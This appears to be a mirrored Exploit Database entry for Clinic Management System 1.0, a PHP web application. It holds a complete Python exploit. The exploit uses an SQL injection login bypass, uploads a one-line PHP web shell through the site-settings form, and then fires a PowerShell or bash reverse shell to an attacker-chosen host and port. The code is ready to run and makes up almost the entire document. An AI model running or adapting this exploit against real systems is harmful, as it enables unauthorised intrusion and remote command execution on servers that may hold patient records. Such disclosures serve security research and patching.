Clinic Management System 1.0 – SQL injection to Remote Code Execution

• Exploit Database
• 17 阅读

• 作者： Pablo Santiago
  日期： 2021-10-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50439/

• # Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
  # Date:21/10/2021
  # Exploit Author: Pablo Santiago
  # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
  # Version: 1.0
  # Tested on: Windows 7 and Ubuntu 21.10
  # References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
  
  # Vulnerability: Through SQL injection to bypass the login form it is
  # possible to upload a malicious file and after use that malicious file to
  # execute code in the remote system.
  # Proof of Concept:
  
  import requests
  import sys
  import time
  
  
  session = requests.Session()
  #http_proxy= "http://127.0.0.1:8080"
  #https_proxy = "https://127.0.0.1:8080"
  
  #proxyDict = {"http": http_proxy,
  # "https" : https_proxy}
  
  def windows(HPW,host,shell_name):
  payload =
  """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
  host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
  #print(payload)
  try:
  request_rce = requests.get(host2,timeout=8)
  except requests.exceptions.ReadTimeout:
  pass
  
  
  def linux(HPL,host,shell_name):
  payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
  host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
  #print(payload)
  try:
  request_rce = requests.get(host2,timeout=8)
  except requests.exceptions.ReadTimeout:
  pass
  
  def main():
  
  host = sys.argv[1]
  shell_name = sys.argv[2]
  url = host + '/login.php'
  values = {'user': "admin",
   'email': "' OR 1 -- -",
   'password': '',
   'btn_login': ""
   }
  
  r = session.post(url, data=values)
  cookie = session.cookies.get_dict()['PHPSESSID']
  
  data = { 'btn_web':''}
  headers= {'Cookie': 'PHPSESSID='+cookie}
  
  
  
  request = session.post(host+ '/manage_website.php', data=data,
  headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})
  print("")
  print('[*] Your Simple Webshell was uploaded to ' + host +
  '/uploadImage/Logo/' + shell_name + '.php' )
  print("")
  LHOST = input('[+] Enter your LHOST: ')
  LPORT = input('[+] Enter your LPORT: ')
  print("")
  HPW= "'"+LHOST+"'"+','+LPORT
  HPL= ""+LHOST+""+'/'+LPORT
  
  print('[+] Option 1: Windows')
  print('[+] Option 2: Linux')
  
  option = input('[+] Choose OS: ')
  
  if option == "1":
  
  windows(HPW,host,shell_name)
  exit()
  
  elif option == "2":
  linux(HPL,host,shell_name)
  exit()
  
  else:
  print("Please choose Windows or Linux")
  
  main()
  
  #Usage: python3 host shell_name
  #Example: python3 http://localhost/clinic shell